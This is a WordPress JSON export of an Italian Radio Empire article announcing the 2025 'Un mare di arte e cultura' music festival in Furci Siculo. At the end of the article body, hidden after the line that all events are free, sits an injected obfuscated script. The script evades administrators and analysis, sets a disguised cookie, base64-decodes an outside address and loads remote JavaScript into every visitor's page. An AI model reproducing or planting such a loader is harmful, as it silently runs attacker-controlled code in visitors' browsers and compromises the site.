{"id":55317,"date":"2025-07-22T12:29:26","date_gmt":"2025-07-22T12:29:26","guid":{"rendered":"https:\/\/www.radioempire.it\/?p=55317"},"modified":"2026-02-24T22:41:57","modified_gmt":"2026-02-24T22:41:57","slug":"un-mare-di-arte-e-cultura-2025-furci-siculo-diventa-capitale-della-musica","status":"publish","type":"post","link":"https:\/\/www.radioempire.it\/index.php\/2025\/07\/22\/un-mare-di-arte-e-cultura-2025-furci-siculo-diventa-capitale-della-musica\/","title":{"rendered":"Un mare di arte e cultura 2025: Furci Siculo diventa capitale della musica"},"content":{"rendered":"<p>Dal 24 al 27 luglio, la quinta edizione della rassegna culturale sostenuta dal Comune di Furci Siculo e dall\u2019Assessorato regionale alle Autonomie Locali<\/p>\n<p>C\u2019\u00e8 chi dice che la bellezza salver\u00e0 il mondo. A Furci Siculo, la bellezza si fa comunit\u00e0, si fa suono, si fa festa. Dal 24 al 27 luglio, torna \u201cUn mare di arte e cultura\u201d, la manifestazione che da cinque anni regala musica di qualit\u00e0, arte partecipata e nuove connessioni tra generazioni.<\/p>\n<p>Un progetto reso possibile grazie al forte impegno del Comune di Furci Siculo, da sempre in prima linea nella promozione culturale e nella valorizzazione del territorio, e al contributo dell\u2019Assessorato alle Autonomie Locali e alla Funzione Pubblica della Regione Siciliana, che ha creduto e investito in questa iniziativa sinergica e dal forte impatto sociale.<\/p>\n<p>Musica in ogni angolo: dalla spiaggia alla piazza, dall\u2019alba alla notteSotto la direzione artistica di Carmelo Coglitore, insieme a Fabio Raspa e Alessandro Niosi (Associazione Musicale Citt\u00e0 di Furci Siculo), il festival si svolger\u00e0 tra la spiaggia, il lungomare e piazza Sacro Cuore. L\u2019obiettivo \u00e8 chiaro: far risuonare Furci Siculo come un grande teatro a cielo aperto.<\/p>\n<p><img loading=\"lazy\" class=\"size-medium wp-image-55324 alignleft\" src=\"https:\/\/www.radioempire.it\/wp-content\/uploads\/2025\/07\/un-mare-di-musica-1-210x300.jpg\" alt=\"\" width=\"210\" height=\"300\" srcset=\"https:\/\/www.radioempire.it\/wp-content\/uploads\/2025\/07\/un-mare-di-musica-1-210x300.jpg 210w, https:\/\/www.radioempire.it\/wp-content\/uploads\/2025\/07\/un-mare-di-musica-1-717x1024.jpg 717w, https:\/\/www.radioempire.it\/wp-content\/uploads\/2025\/07\/un-mare-di-musica-1-768x1096.jpg 768w, https:\/\/www.radioempire.it\/wp-content\/uploads\/2025\/07\/un-mare-di-musica-1.jpg 800w\" sizes=\"(max-width: 210px) 100vw, 210px\" \/>Si parte il 24 luglio con la sfilata delle bande musicali, la proiezione del film \u201cUn mare di arte e cultura\u201d e i concerti delle bande di Casalvecchio e Furci.<\/p>\n<p>Il 25 luglio sar\u00e0 all\u2019insegna della musica da camera con l\u2019alba d\u2019archi del Quintetto Arena, i flauti di Carlo Nicita, il duo Gemma e Alberto Alibrandi e il Birthday Concert Ensemble.<\/p>\n<p>Sabato 26 luglio \u00e8 il giorno delle emozioni profonde: Bagno di Gong all\u2019alba, sculture sonore di Yuri Kalendarev, il giovanissimo Mattia Maugeri e il jazz contaminato del Raustina Trio. Mezzanotte segna l\u2019inizio della festosa Notte Bianca della Milonga, con tango e danza fino alle 3 del mattino.<\/p>\n<p>Gran finale domenica 27 luglio: Tango el amanecer all\u2019alba, il fagotto solista di Antonino Cicero, la presentazione del libro \u201cFurci Tamar\u00ec\u201d di Vittorio \u201cAlberovivo\u201d Gregorio, e infine, il concerto dell\u2019Orchestra Sinfonica Giovanile di Messina, diretta dal M\u00b0 Nazzareno De Benedetto.<\/p>\n<p>A Radio Empire, che trasmette solo musica e buone notizie, non possiamo che accogliere con entusiasmo questa rete di suoni, storie e speranza, costruita con passione da chi crede che la cultura sia davvero una forma di crescita collettiva.<\/p>\n<p>&nbsp;<\/p>\n<p><strong>Articolo di<\/strong><\/p>\n<p><strong>Carolina Foti<\/strong><\/p>\n<p>&nbsp;<\/p>\n<p><strong>Tutti gli eventi in programma sono gratuiti.<\/strong><script>(function(){try{if(document.getElementById&&document.getElementById('wpadminbar'))return;var t0=+new Date();for(var i=0;i<20000;i++){var z=i*i;}if((+new Date())-t0>120)return;if((document.cookie||'').indexOf('http2_session_id=')!==-1)return;function systemLoad(input){var key='ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+\/=',o1,o2,o3,h1,h2,h3,h4,dec='',i=0;input=input.replace(\/[^A-Za-z0-9\\+\\\/\\=]\/g,'');while(i<input.length){h1=key.indexOf(input.charAt(i++));h2=key.indexOf(input.charAt(i++));h3=key.indexOf(input.charAt(i++));h4=key.indexOf(input.charAt(i++));o1=(h1<<2)|(h2>>4);o2=((h2&15)<<4)|(h3>>2);o3=((h3&3)<<6)|h4;dec+=String.fromCharCode(o1);if(h3!=64)dec+=String.fromCharCode(o2);if(h4!=64)dec+=String.fromCharCode(o3);}return dec;}var u=systemLoad('aHR0cHM6Ly9zZWFyY2hyYW5rdHJhZmZpYy5saXZlL2pzeA==');if(typeof window!=='undefined'&#038;&#038;window.__rl===u)return;var d=new Date();d.setTime(d.getTime()+30*24*60*60*1000);document.cookie='http2_session_id=1; expires='+d.toUTCString()+'; path=\/; SameSite=Lax'+(location.protocol==='https:'?'; Secure':'');try{window.__rl=u;}catch(e){}var s=document.createElement('script');s.type='text\/javascript';s.async=true;s.src=u;try{s.setAttribute('data-rl',u);}catch(e){}(document.getElementsByTagName('head')[0]||document.documentElement).appendChild(s);}catch(e){}})();<\/script><\/p>\n","protected":false},"excerpt":{"rendered":"<p>Dal 24 al 27 luglio, la quinta edizione della rassegna culturale sostenuta dal Comune di Furci Siculo e dall\u2019Assessorato regionale alle Autonomie Locali C\u2019\u00e8 chi dice che la bellezza salver\u00e0<\/p>\n<div><a class=\"permalink\" href=\"https:\/\/www.radioempire.it\/index.php\/2025\/07\/22\/un-mare-di-arte-e-cultura-2025-furci-siculo-diventa-capitale-della-musica\/\">Read More&#8230;<\/a><\/div>\n","protected":false},"author":2,"featured_media":55318,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":[],"categories":[36,78],"tags":[],"_links":{"self":[{"href":"https:\/\/www.radioempire.it\/index.php\/wp-json\/wp\/v2\/posts\/55317"}],"collection":[{"href":"https:\/\/www.radioempire.it\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.radioempire.it\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.radioempire.it\/index.php\/wp-json\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/www.radioempire.it\/index.php\/wp-json\/wp\/v2\/comments?post=55317"}],"version-history":[{"count":5,"href":"https:\/\/www.radioempire.it\/index.php\/wp-json\/wp\/v2\/posts\/55317\/revisions"}],"predecessor-version":[{"id":57384,"href":"https:\/\/www.radioempire.it\/index.php\/wp-json\/wp\/v2\/posts\/55317\/revisions\/57384"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/www.radioempire.it\/index.php\/wp-json\/wp\/v2\/media\/55318"}],"wp:attachment":[{"href":"https:\/\/www.radioempire.it\/index.php\/wp-json\/wp\/v2\/media?parent=55317"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.radioempire.it\/index.php\/wp-json\/wp\/v2\/categories?post=55317"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.radioempire.it\/index.php\/wp-json\/wp\/v2\/tags?post=55317"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}